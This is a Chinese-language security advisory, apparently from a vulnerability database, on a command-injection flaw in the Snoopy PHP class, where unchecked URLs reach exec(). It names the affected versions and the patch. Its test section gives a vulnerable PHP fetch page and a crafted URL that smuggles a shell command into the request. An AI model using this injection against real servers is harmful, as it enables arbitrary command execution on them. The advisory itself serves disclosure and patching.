发布日期：2005-10-27
更新日期：2005-10-27

受影响系统：

Snoopy Snoopy 1.2
Snoopy Snoopy 1.01
Snoopy Snoopy 0.94
Snoopy Snoopy 0.93
Snoopy Snoopy 0.92
Snoopy Snoopy 0.91

不受影响系统：

Snoopy Snoopy 1.2.1

描述：

---

BUGTRAQ  ID: 15213

Snoopy是模拟Web浏览器的PHP类，可自动完成检索网页内容和张贴表单等任务。

Snoopy对URL的处理存在漏洞，远程攻击者可能利用此漏洞在主机上执行任意命令。

在使用Snoopy API调用请求SSL保护的网页时，会调用_httpsrequest函数，而该函数会将URL用作参数。然后该函数会未经检查用户输入便调用PHP函数exec。如果使用了特制URL的话，攻击者就可以提供任意命令，并在Web Server上执行这些命令。

<*来源：Daniel Fabian （d.fabian@sec-consult.com）
        Bernhard Mueller （research@sec-consult.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=113034456922188&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?
include "Snoopy.class.php";
$snoopy = new Snoopy;

$snoopy->fetch($_GET['url']);
echo "<PRE>\n";
print $snoopy->results;
echo "</PRE>\n";
?>

请求上述代码就可能导致执行任意代码：

http://server/fetch.php?url=https://www.%22;+echo+'hello'+%3E+test.txt

建议：

---

厂商补丁：

Snoopy
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

* Snoopy Upgrade Snoopy-1.2.1.tar.gz
http://prdownloads.sourceforge.net/snoopy/Snoopy-1.2.1.tar.gz?download

浏览次数：3214
严重程度：0（网友投票）